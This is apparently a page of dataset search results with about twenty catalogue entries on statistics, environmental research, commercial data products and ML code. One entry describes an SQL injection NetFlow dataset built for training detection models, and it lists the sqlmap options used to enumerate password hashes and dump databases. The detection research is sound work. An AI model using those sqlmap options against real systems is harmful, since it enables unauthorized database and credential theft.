100+ datasets found

h
example-generate-preference-dataset
huggingface.co
Updated Aug 23, 2024
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
distilabel-internal-testing (2024). example-generate-preference-dataset [Dataset]. https://huggingface.co/datasets/distilabel-internal-testing/example-generate-preference-dataset
Explore at:
CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
Dataset updated
Aug 23, 2024
Dataset authored and provided by
distilabel-internal-testing
Description
Dataset Card for example-preference-dataset

This dataset has been created with distilabel.

Dataset Summary

This dataset contains a pipeline.yaml which can be used to reproduce the pipeline that generated it in distilabel using the distilabel CLI: distilabel pipeline run --config "https://huggingface.co/datasets/sdiazlor/example-preference-dataset/raw/main/pipeline.yaml"

or explore the configuration: distilabel pipeline info --config… See the full description on the dataset page: https://huggingface.co/datasets/distilabel-internal-testing/example-generate-preference-dataset.
Z
SQL Injection Attack Netflow
data.niaid.nih.gov
zenodo.org
Updated Sep 28, 2022
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251
Explore at:
Dataset updated
Sep 28, 2022
Dataset provided by
Adrián Campazas
Ignacio Crespo
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
Introduction

This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.

NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

Datasets

The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).

The datasets contain both benign and malicious traffic. All collected datasets are balanced.

The version of NetFlow used to build the datasets is 5.

Dataset Aim Samples Benign-malicious traffic ratio D1 Training 400,003 50% D2 Test 57,239 50%

Infrastructure and implementation

Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.

DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)

Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).

The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.

The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.

Parameters Description '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema' Enumerate users, password hashes, privileges, roles, databases, tables and columns --level=5 Increase the probability of a false positive identification --risk=3 Increase the probability of extracting data --random-agent Select the User-Agent randomly --batch Never ask for user input, use the default behavior --answers="follow=Y" Predefined answers to yes

Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).

The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.

However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.

To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
Data used to produce figures and tables
catalog.data.gov
datasets.ai
Updated May 15, 2021
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
U.S. EPA Office of Research and Development (ORD) (2021). Data used to produce figures and tables [Dataset]. https://catalog.data.gov/dataset/data-used-to-produce-figures-and-tables-c6864
Explore at:
Dataset updated
May 15, 2021
Dataset provided by
United States Environmental Protection Agencyhttp://www.epa.gov/
Description
The data set was used to produce tables and figures in paper. This dataset is associated with the following publications: Lytle, D., S. Pfaller, C. Muhlen, I. Struewing, S. Triantafyllidou, C. White, S. Hayes, D. King, and J. Lu. A Comprehensive Evaluation of Monochloramine Disinfection on Water Quality, Legionella and Other Important Microorganisms in a Hospital. WATER RESEARCH. Elsevier Science Ltd, New York, NY, USA, 189: 116656, (2021). Lytle, D., C. Formal, K. Cahalan, C. Muhlen, and S. Triantafyllidou. The Impact of Sampling Approach and Daily Water Usage on Lead Levels Measured at the Tap. WATER RESEARCH. Elsevier Science Ltd, New York, NY, USA, 197: 117071, (2021).
Marketing Enablement Support To Generate Leads
globaldata.com
Updated Nov 26, 2022
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
GlobalData UK Ltd. (2022). Marketing Enablement Support To Generate Leads [Dataset]. https://www.globaldata.com/custom-solutions/solutions-in-action/marketing-enablement-support-generate-leads/
Explore at:
Dataset updated
Nov 26, 2022
Dataset provided by
GlobalDatahttps://www.globaldata.com/
GlobalData UK Ltd
Authors
GlobalData UK Ltd.
License
https://www.globaldata.com/privacy-policy/https://www.globaldata.com/privacy-policy/
Area covered
Global
Description
Learn how GlobalData’s marketing enablement solutions helped companies optimize lead generation strategies and improve conversion rates. Read More
d
Coresignal | Private Company Data | Company Data | AI-Enriched Datasets |...
datarade.ai
.json, .csv
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Coresignal, Coresignal | Private Company Data | Company Data | AI-Enriched Datasets | Global / 35M+ Records / Updated Weekly [Dataset]. https://datarade.ai/data-products/coresignal-private-company-data-company-data-ai-enriche-coresignal
Explore at:
.json, .csvAvailable download formats
Dataset authored and provided by
Coresignal
Area covered
Jamaica, Argentina, Benin, Grenada, Pitcairn, Kyrgyzstan, Senegal, Kiribati, Bhutan, Togo
Description
This Private Company Data dataset is a refined version of our company datasets, consisting of 35M+ data records.

It’s an excellent data solution for companies with limited data engineering capabilities and those who want to reduce their time to value. You get filtered, cleaned, unified, and standardized B2B private company data. This data is also enriched by leveraging a carefully instructed large language model (LLM).

AI-powered data enrichment offers more accurate information in key data fields, such as company descriptions. It also produces over 20 additional data points that are very valuable to B2B businesses. Enhancing and highlighting the most important information in web data contributes to quicker time to value, making data processing much faster and easier.

For your convenience, you can choose from multiple data formats (Parquet, JSON, JSONL, or CSV) and select suitable delivery frequency (quarterly, monthly, or weekly).

Coresignal is a leading private company data provider in the web data sphere with an extensive focus on firmographic data and public employee profiles. More than 3B data records in different categories enable companies to build data-driven products and generate actionable insights. Coresignal is exceptional in terms of data freshness, with 890M+ records updated monthly for unprecedented accuracy and relevance.
Amount of data created, consumed, and stored 2010-2023, with forecasts to...
statista.com
Updated Nov 21, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Statista (2024). Amount of data created, consumed, and stored 2010-2023, with forecasts to 2028 [Dataset]. https://www.statista.com/statistics/871513/worldwide-data-created/
Explore at:
Dataset updated
Nov 21, 2024
Dataset authored and provided by
Statistahttp://statista.com/
Time period covered
May 2024
Area covered
Worldwide
Description
The total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly, reaching 149 zettabytes in 2024. Over the next five years up to 2028, global data creation is projected to grow to more than 394 zettabytes. In 2020, the amount of data created and replicated reached a new high. The growth was higher than previously expected, caused by the increased demand due to the COVID-19 pandemic, as more people worked and learned from home and used home entertainment options more often. Storage capacity also growing Only a small percentage of this newly created data is kept though, as just two percent of the data produced and consumed in 2020 was saved and retained into 2021. In line with the strong growth of the data volume, the installed base of storage capacity is forecast to increase, growing at a compound annual growth rate of 19.2 percent over the forecast period from 2020 to 2025. In 2020, the installed base of storage capacity reached 6.7 zettabytes.
h
my-dataset-generate
huggingface.co
Updated Jan 12, 2025
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Bipul Sharma (2025). my-dataset-generate [Dataset]. https://huggingface.co/datasets/Bipul8765/my-dataset-generate
Explore at:
CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
Dataset updated
Jan 12, 2025
Authors
Bipul Sharma
Description
Dataset Card for my-dataset-generate

This dataset has been created with distilabel.

Dataset Summary

This dataset contains a pipeline.yaml which can be used to reproduce the pipeline that generated it in distilabel using the distilabel CLI: distilabel pipeline run --config "https://huggingface.co/datasets/Bipul8765/my-dataset-generate/raw/main/pipeline.yaml"

or explore the configuration: distilabel pipeline info --config… See the full description on the dataset page: https://huggingface.co/datasets/Bipul8765/my-dataset-generate.
Construct validity results.
plos.figshare.com
figshare.com
xls
Updated Jun 16, 2023
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Md. Atikur Rahaman; H. M. Kamrul Hassan; Ahmed Al Asheq; K. M. Anwarul Islam (2023). Construct validity results. [Dataset]. http://doi.org/10.1371/journal.pone.0272926.t002
Explore at:
xlsAvailable download formats
Unique identifier
https://doi.org/10.1371/journal.pone.0272926.t002
Dataset updated
Jun 16, 2023
Dataset provided by
PLOShttp://plos.org/
Authors
Md. Atikur Rahaman; H. M. Kamrul Hassan; Ahmed Al Asheq; K. M. Anwarul Islam
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
Construct validity results.
Big data and business analytics revenue worldwide 2015-2022
statista.com
Updated Nov 22, 2023
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Statista (2023). Big data and business analytics revenue worldwide 2015-2022 [Dataset]. https://www.statista.com/statistics/551501/worldwide-big-data-business-analytics-revenue/
Explore at:
Dataset updated
Nov 22, 2023
Dataset authored and provided by
Statistahttp://statista.com/
Area covered
Worldwide
Description
The global big data and business analytics (BDA) market was valued at 168.8 billion U.S. dollars in 2018 and is forecast to grow to 215.7 billion U.S. dollars by 2021. In 2021, more than half of BDA spending will go towards services. IT services is projected to make up around 85 billion U.S. dollars, and business services will account for the remainder. Big data High volume, high velocity and high variety: one or more of these characteristics is used to define big data, the kind of data sets that are too large or too complex for traditional data processing applications. Fast-growing mobile data traffic, cloud computing traffic, as well as the rapid development of technologies such as artificial intelligence (AI) and the Internet of Things (IoT) all contribute to the increasing volume and complexity of data sets. For example, connected IoT devices are projected to generate 79.4 ZBs of data in 2025. Business analytics Advanced analytics tools, such as predictive analytics and data mining, help to extract value from the data and generate business insights. The size of the business intelligence and analytics software application market is forecast to reach around 16.5 billion U.S. dollars in 2022. Growth in this market is driven by a focus on digital transformation, a demand for data visualization dashboards, and an increased adoption of cloud.
Maps generator
zenodo.org
text/x-python, zip
Updated Mar 8, 2024
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Marcos Terol; Marcos Terol; Pedro Gomez-Gasquet; Pedro Gomez-Gasquet; Francisco Fraile; Francisco Fraile; Andrés Boza; Andrés Boza (2024). Maps generator [Dataset]. http://doi.org/10.5281/zenodo.10796431
Explore at:
text/x-python, zipAvailable download formats
Unique identifier
https://doi.org/10.5281/zenodo.10796431
Dataset updated
Mar 8, 2024
Dataset provided by
Zenodohttp://zenodo.org/
Authors
Marcos Terol; Marcos Terol; Pedro Gomez-Gasquet; Pedro Gomez-Gasquet; Francisco Fraile; Francisco Fraile; Andrés Boza; Andrés Boza
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
The Python code provided generates polygonal maps resembling geographical landscapes, where certain areas may represent features like lakes or inaccessible regions. These maps are generated with specified characteristics such as regularity, gap density, and gap scale.

Features:

Polygon Generation:

The code utilizes the Shapely library to generate polygonal shapes within specified bounding boxes. These polygons serve as the primary representation of the map.

Gap Generation:

Within the generated polygons, the code introduces gaps to simulate features like lakes or inaccessible areas. These gaps are represented as holes within the central polygon.

Forest Generation

Within the generated polygons, the code introduces different forest areas. These forest are added like a new Feature inside the GEOJSON.

Parameterized Generation:

The generation process is parameterized, allowing control over features such as regularity (shape uniformity), gap density (homogeneity of gaps), and gap scale (size of gaps relative to the polygon).

Components:

PolygonGenerator Class:

Responsible for generating the outer polygon shape and introducing gaps to simulate features.

Offers methods to generate individual polygons with specified characteristics.

Parameter Ranges and Experimentation:

The code includes predefined ranges for regularity, gap density, vertex number, bounding box, forest density and forest scale range in 3 different CSV.

It conducts experiments by generating maps with different parameter combinations, offering insights into how these parameters affect the map's appearance.

Usage:

Map Generation:

Users can instantiate the PolygonGenerator class to generate individual polygons representing maps with specific features.

Parameters such as regularity, gap density, and gap scale can be adjusted to customize the map generation process.

Experimentation:

Users can experiment with different parameter combinations to observe the effects on map generation.

This allows for exploration and understanding of how different parameters influence the characteristics of generated maps.

Potential Applications:

The code can be used in various applications requiring the generation of simulated landscapes, such as in gaming, geographical analysis, or educational tools.

It provides a flexible and customizable framework for creating maps with specific features, allowing users to tailor the generated maps to their requirements.

Can be applied to generate maps for drone scanning operations, facilitating optimized area division and efficient data collection.
Data used by EPA researchers to generate illustrative figures for overview...
catalog.data.gov
datasets.ai
+1more
Updated Nov 14, 2020
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
U.S. EPA Office of Research and Development (ORD) (2020). Data used by EPA researchers to generate illustrative figures for overview article "Multiscale Modeling of Background Ozone: Research Needs to Inform and Improve Air Quality Management" [Dataset]. https://catalog.data.gov/dataset/data-used-by-epa-researchers-to-generate-illustrative-figures-for-overview-article-multisc
Explore at:
Dataset updated
Nov 14, 2020
Dataset provided by
United States Environmental Protection Agencyhttp://www.epa.gov/
Description
Data sets used to prepare illustrative figures for the overview article “Multiscale Modeling of Background Ozone” Overview The CMAQ model output datasets used to create illustrative figures for this overview article were generated by scientists in EPA/ORD/CEMM and EPA/OAR/OAQPS. The EPA/ORD/CEMM-generated dataset consisted of hourly CMAQ output from two simulations. The first simulation was performed for July 1 – 31 over a 12 km modeling domain covering the Western U.S. The simulation was configured with the Integrated Source Apportionment Method (ISAM) to estimate the contributions from 9 source categories to modeled ozone. ISAM source contributions for July 17 – 31 averaged over all grid cells located in Colorado were used to generate the illustrative pie chart in the overview article. The second simulation was performed for October 1, 2013 – August 31, 2014 over a 108 km modeling domain covering the northern hemisphere. This simulation was also configured with ISAM to estimate the contributions from non-US anthropogenic sources, natural sources, stratospheric ozone, and other sources on ozone concentrations. Ozone ISAM results from this simulation were extracted along a boundary curtain of the 12 km modeling domain specified over the Western U.S. for the time period January 1, 2014 – July 31, 2014 and used to generate the illustrative time-height cross-sections in the overview article. The EPA/OAR/OAQPS-generated dataset consisted of hourly gridded CMAQ output for surface ozone concentrations for the year 2016. The CMAQ simulations were performed over the northern hemisphere at a horizontal resolution of 108 km. NO2 and O3 data for July 2016 was extracted from these simulations generate the vertically-integrated column densities shown in the illustrative comparison to satellite-derived column densities. CMAQ Model Data The data from the CMAQ model simulations used in this research effort are very large (several terabytes) and cannot be uploaded to ScienceHub due to size restrictions. The model simulations are stored on the /asm archival system accessible through the atmos high-performance computing (HPC) system. Due to data management policies, files on /asm are subject to expiry depending on the template of the project. Files not requested for extension after the expiry date are deleted permanently from the system. The format of the files used in this analysis and listed below is ioapi/netcdf. Documentation of this format, including definitions of the geographical projection attributes contained in the file headers, are available at https://www.cmascenter.org/ioapi/ Documentation on the CMAQ model, including a description of the output file format and output model species can be found in the CMAQ documentation on the CMAQ GitHub site at https://github.com/USEPA/CMAQ. This dataset is associated with the following publication: Hogrefe, C., B. Henderson, G. Tonnesen, R. Mathur, and R. Matichuk. Multiscale Modeling of Background Ozone: Research Needs to Inform and Improve Air Quality Management. EM Magazine. Air and Waste Management Association, Pittsburgh, PA, USA, 1-6, (2020).
Envestnet | Yodlee's De-Identified Consumer Purchase Data | Row/Aggregate...
datarade.ai
.sql, .txt
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Envestnet | Yodlee, Envestnet | Yodlee's De-Identified Consumer Purchase Data | Row/Aggregate Level | USA Consumer Data covering 3600+ corporations | 90M+ Accounts [Dataset]. https://datarade.ai/data-products/envestnet-yodlee-s-consumer-purchase-data-row-aggregate-envestnet-yodlee
Explore at:
.sql, .txtAvailable download formats
Dataset provided by
Envestnethttp://envestnet.com/
Yodlee
Authors
Envestnet | Yodlee
Area covered
United States of America
Description
Envestnet®| Yodlee®'s Consumer Purchase Data (Aggregate/Row) Panels consist of de-identified, near-real time (T+1) USA credit/debit/ACH transaction level data – offering a wide view of the consumer activity ecosystem. The underlying data is sourced from end users leveraging the aggregation portion of the Envestnet®| Yodlee®'s financial technology platform.

Envestnet | Yodlee Consumer Panels (Aggregate/Row) include data relating to millions of transactions, including ticket size and merchant location. The dataset includes de-identified credit/debit card and bank transactions (such as a payroll deposit, account transfer, or mortgage payment). Our coverage offers insights into areas such as consumer, TMT, energy, REITs, internet, utilities, ecommerce, MBS, CMBS, equities, credit, commodities, FX, and corporate activity. We apply rigorous data science practices to deliver key KPIs daily that are focused, relevant, and ready to put into production.

We offer free trials. Our team is available to provide support for loading, validation, sample scripts, or other services you may need to generate insights from our data.

Investors, corporate researchers, and corporates can use our data to answer some key business questions such as: - How much are consumers spending with specific merchants/brands and how is that changing over time? - Is the share of consumer spend at a specific merchant increasing or decreasing? - How are consumers reacting to new products or services launched by merchants? - For loyal customers, how is the share of spend changing over time? - What is the company’s market share in a region for similar customers? - Is the company’s loyal user base increasing or decreasing? - Is the lifetime customer value increasing or decreasing?

Additional Use Cases: - Use spending data to analyze sales/revenue broadly (sector-wide) or granular (company-specific). Historically, our tracked consumer spend has correlated above 85% with company-reported data from thousands of firms. Users can sort and filter by many metrics and KPIs, such as sales and transaction growth rates and online or offline transactions, as well as view customer behavior within a geographic market at a state or city level. - Reveal cohort consumer behavior to decipher long-term behavioral consumer spending shifts. Measure market share, wallet share, loyalty, consumer lifetime value, retention, demographics, and more.) - Study the effects of inflation rates via such metrics as increased total spend, ticket size, and number of transactions. - Seek out alpha-generating signals or manage your business strategically with essential, aggregated transaction and spending data analytics.

Use Cases Categories (Our data provides an innumerable amount of use cases, and we look forward to working with new ones): 1. Market Research: Company Analysis, Company Valuation, Competitive Intelligence, Competitor Analysis, Competitor Analytics, Competitor Insights, Customer Data Enrichment, Customer Data Insights, Customer Data Intelligence, Demand Forecasting, Ecommerce Intelligence, Employee Pay Strategy, Employment Analytics, Job Income Analysis, Job Market Pricing, Marketing, Marketing Data Enrichment, Marketing Intelligence, Marketing Strategy, Payment History Analytics, Price Analysis, Pricing Analytics, Retail, Retail Analytics, Retail Intelligence, Retail POS Data Analysis, and Salary Benchmarking

Investment Research: Financial Services, Hedge Funds, Investing, Mergers & Acquisitions (M&A), Stock Picking, Venture Capital (VC)

Consumer Analysis: Consumer Data Enrichment, Consumer Intelligence

Market Data: AnalyticsB2C Data Enrichment, Bank Data Enrichment, Behavioral Analytics, Benchmarking, Customer Insights, Customer Intelligence, Data Enhancement, Data Enrichment, Data Intelligence, Data Modeling, Ecommerce Analysis, Ecommerce Data Enrichment, Economic Analysis, Financial Data Enrichment, Financial Intelligence, Local Economic Forecasting, Location-based Analytics, Market Analysis, Market Analytics, Market Intelligence, Market Potential Analysis, Market Research, Market Share Analysis, Sales, Sales Data Enrichment, Sales Enablement, Sales Insights, Sales Intelligence, Spending Analytics, Stock Market Predictions, and Trend Analysis
All raw data used to generate results
s.cnmilf.com
catalog.data.gov
Updated Nov 12, 2020
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
U.S. EPA Office of Research and Development (ORD) (2020). All raw data used to generate results [Dataset]. https://s.cnmilf.com/user74170196/https/catalog.data.gov/dataset/all-raw-data-used-to-generate-results
Explore at:
Dataset updated
Nov 12, 2020
Dataset provided by
United States Environmental Protection Agencyhttp://www.epa.gov/
Description
This dataset contains all data used in this study, including site ID, latitude, longitude, watershed land cover, water chemistry, and carbon and nitrogen stable isotope ratios of periphyton, invertebrate functional feeding groups, and five most frequently observed invertebrate families. Also included is a list of all invertebrates collected in this study along with their functional feeding group and stable isotope ratios. This dataset is associated with the following publication: Smucker, N., A. Kuhn, C. Cruz-Quinones, J. Serbst, and J. Lake. Stable isotopes of algae and macroinvertebrates in streams respond to watershed urbanization, inform management goals, and indicate food web relationships. ECOLOGICAL INDICATORS. Elsevier Science Ltd, New York, NY, USA, 90: 295-304, (2018).
f
Simulation results for pairs with counts > 1.
figshare.com
plos.figshare.com
xls
Updated Jan 17, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Shuyuan Lou; Shili Lin (2024). Simulation results for pairs with counts > 1. [Dataset]. http://doi.org/10.1371/journal.pone.0287521.t003
Explore at:
xlsAvailable download formats
Unique identifier
https://doi.org/10.1371/journal.pone.0287521.t003
Dataset updated
Jan 17, 2024
Dataset provided by
PLOS ONE
Authors
Shuyuan Lou; Shili Lin
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
The average and standard deviation (within parentheses) across five replicates are provided for each setting and each method.
The SPIN covid19 RMRIO dataset: Global trade network data for the years...
data.subak.org
data.niaid.nih.gov
+1more
csv
Updated Feb 16, 2023
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Zenodo (2023). The SPIN covid19 RMRIO dataset: Global trade network data for the years 2016-2026 reflecting macroeconomic effects of the covid19 pandemic - A. Code and data for 2016-2019 [Dataset]. https://data.subak.org/dataset/the-spin-covid19-rmrio-dataset-global-trade-network-data-for-the-years-2016-2026-refl-2016-2019
Explore at:
csvAvailable download formats
Dataset updated
Feb 16, 2023
Dataset provided by
Zenodohttp://zenodo.org/
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
The SPIN covid19 RMRIO dataset is a time series of MRIO tables covering years from 2016-2026 on a yearly basis. The dataset covers 163 sectors in 155 countries.

This repository includes data for years from 2016 to 2019 (hist scenario) and the corresponding labels.

Data for years 2020 to 2026 are stored in the corresponding repositories:

covid: 10.5281/zenodo.5713825

counterfactual: 10.5281/zenodo.5713839

Tables are generated using the SPIN method, based on the RMRIO tables for the year 2015, GDP, imports and exports data from the International Financial Statistics (IFS) and the World Economic Outlooks (WEO) of October 2019 and April 2021.

From 2020 to 2026, the dataset includes two diverging scenarios. The covid scenario is in line with April 2021 WEO's data and includes the macroeconomic effects of Covid 19. The counterfactual scenario is in line with October 2019 WEO's data and simulates the global economy without Covid 19. Tables from 2016 to 2019 are labelled as hist.

The Projections folder includes the generated tables for years from 2016 to 2019 (hist scenario) and the corresponding labels.

The Sources folder contains the data records from the IFS and WEO databases. The Method data contains the data files used to generate the tables with the SPIN method and the following Python scripts:

SPIN_covid19_MRIO_files_preparation.py generates the data files from the source data.

SPIN_covid19_RMRIO runs.py is the command to run the SPIN method and generate the dataset.

figures.py is a script to produce figures reflecting the consistency of the projected tables and the evolution of macroeconomic figures in the 2016-2026 period for a selection of countries.

All tables are labelled in 2015 US$ and valued in basic prices.
d
Data from: On-farm wildflower plantings generate opposing reproductive...
catalog.data.gov
agdatacommons.nal.usda.gov
Updated Jan 31, 2025
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Agricultural Research Service (2025). Data from: On-farm wildflower plantings generate opposing reproductive outcomes for solitary and bumble bee species [Dataset]. https://catalog.data.gov/dataset/data-from-on-farm-wildflower-plantings-generate-opposing-reproductive-outcomes-for-solitar
Explore at:
Dataset updated
Jan 31, 2025
Dataset provided by
Agricultural Research Service
Description
Pollinator habitat can be planted on farms to enhance floral and nesting resources, and subsequently, pollinator populations. There is ample evidence linking such plantings to greater pollinator abundance on farms, but less is known about their effects on pollinator reproduction. We placed Bombus impatiens Cresson (Hymenoptera: Apidae) and Megachile rotundata (F.) (Hymenoptera: Megachilidae) nests out on 19 Mid-Atlantic farms in 2018, where half (n=10) the farms had established wildflower plantings and half (n=9) did not. Bombus impatiens nests were placed at each farm in spring and mid-summer and repeatedly weighed to capture colony growth. We quantified the relative production of reproductive castes and assessed parasitism rates by screening for conopid fly parasitism and Nosema spores within female workers. We also released M. rotundata cocoons at each farm in spring and collected new nests and emergent adult offspring over the next year, recording female weight as an indicator of reproductive potential and quantifying Nosema parasitism and parasitoid infection rates. Bombus impatiens nests gained less weight and contained female workers with Nosema spore loads over 150x greater on farms with wildflower plantings. In contrast, M. rotundata female offspring weighed more on farms with wildflower plantings and marginally less on farms with honey bee hives. We conclude that wildflower plantings likely enhance reproduction in some species, but that they could also enhance microsporidian parasitism rates in susceptible bee species. It will be important to determine how wildflower planting benefits can be harnessed while minimizing parasitism in wild and managed bee species.
Data volume of IoT connected devices worldwide 2019 and 2025
statista.com
Updated Sep 14, 2022
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Statista (2022). Data volume of IoT connected devices worldwide 2019 and 2025 [Dataset]. https://www.statista.com/statistics/1017863/worldwide-iot-connected-devices-data-size/
Explore at:
Dataset updated
Sep 14, 2022
Dataset authored and provided by
Statistahttp://statista.com/
Time period covered
2019
Area covered
Worldwide
Description
The statistic shows the overall data volume of connected devices/IoT connections worldwide in 201 and 2025. By 2025, total data volume of connected IoT devices worldwide is forecast to reach 79.4 zettabytes (ZBs).
Data and code for: Generation and applications of simulated datasets to...
data.niaid.nih.gov
datadryad.org
zip
Updated Mar 10, 2023
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Matthew Silk; Olivier Gimenez (2023). Data and code for: Generation and applications of simulated datasets to integrate social network and demographic analyses [Dataset]. http://doi.org/10.5061/dryad.m0cfxpp7s
Explore at:
zipAvailable download formats
Unique identifier
https://doi.org/10.5061/dryad.m0cfxpp7s
Dataset updated
Mar 10, 2023
Dataset provided by
Centre d'Ecologie Fonctionnelle et Evolutive
Authors
Matthew Silk; Olivier Gimenez
License
https://spdx.org/licenses/CC0-1.0.htmlhttps://spdx.org/licenses/CC0-1.0.html
Description
Social networks are tied to population dynamics; interactions are driven by population density and demographic structure, while social relationships can be key determinants of survival and reproductive success. However, difficulties integrating models used in demography and network analysis have limited research at this interface. We introduce the R package genNetDem for simulating integrated network-demographic datasets. It can be used to create longitudinal social networks and/or capture-recapture datasets with known properties. It incorporates the ability to generate populations and their social networks, generate grouping events using these networks, simulate social network effects on individual survival, and flexibly sample these longitudinal datasets of social associations. By generating co-capture data with known statistical relationships it provides functionality for methodological research. We demonstrate its use with case studies testing how imputation and sampling design influence the success of adding network traits to conventional Cormack-Jolly-Seber (CJS) models. We show that incorporating social network effects in CJS models generates qualitatively accurate results, but with downward-biased parameter estimates when network position influences survival. Biases are greater when fewer interactions are sampled or fewer individuals are observed in each interaction. While our results indicate the potential of incorporating social effects within demographic models, they show that imputing missing network measures alone is insufficient to accurately estimate social effects on survival, pointing to the importance of incorporating network imputation approaches. genNetDem provides a flexible tool to aid these methodological advancements and help researchers test other sampling considerations in social network studies. Methods The dataset and code stored here is for Case Studies 1 and 2 in the paper. Datsets were generated using simulations in R. Here we provide 1) the R code used for the simulations; 2) the simulation outputs (as .RDS files); and 3) the R code to analyse simulation outputs and generate the tables and figures in the paper.
Meta Kaggle Code
kaggle.com
zip
Updated Mar 20, 2025
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Kaggle (2025). Meta Kaggle Code [Dataset]. https://www.kaggle.com/datasets/kaggle/meta-kaggle-code/code
Explore at:
zip(133186454988 bytes)Available download formats
Dataset updated
Mar 20, 2025
Dataset authored and provided by
Kagglehttp://kaggle.com/
License
Apache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
Description
Explore our public notebook content!

Meta Kaggle Code is an extension to our popular Meta Kaggle dataset. This extension contains all the raw source code from hundreds of thousands of public, Apache 2.0 licensed Python and R notebooks versions on Kaggle used to analyze Datasets, make submissions to Competitions, and more. This represents nearly a decade of data spanning a period of tremendous evolution in the ways ML work is done.

Why we’re releasing this dataset

By collecting all of this code created by Kaggle’s community in one dataset, we hope to make it easier for the world to research and share insights about trends in our industry. With the growing significance of AI-assisted development, we expect this data can also be used to fine-tune models for ML-specific code generation tasks.

Meta Kaggle for Code is also a continuation of our commitment to open data and research. This new dataset is a companion to Meta Kaggle which we originally released in 2016. On top of Meta Kaggle, our community has shared nearly 1,000 public code examples. Research papers written using Meta Kaggle have examined how data scientists collaboratively solve problems, analyzed overfitting in machine learning competitions, compared discussions between Kaggle and Stack Overflow communities, and more.

The best part is Meta Kaggle enriches Meta Kaggle for Code. By joining the datasets together, you can easily understand which competitions code was run against, the progression tier of the code’s author, how many votes a notebook had, what kinds of comments it received, and much, much more. We hope the new potential for uncovering deep insights into how ML code is written feels just as limitless to you as it does to us!

Sensitive data

While we have made an attempt to filter out notebooks containing potentially sensitive information published by Kaggle users, the dataset may still contain such information. Research, publications, applications, etc. relying on this data should only use or report on publicly available, non-sensitive information.

Joining with Meta Kaggle

The files contained here are a subset of the KernelVersions in Meta Kaggle. The file names match the ids in the KernelVersions csv file. Whereas Meta Kaggle contains data for all interactive and commit sessions, Meta Kaggle Code contains only data for commit sessions.

File organization

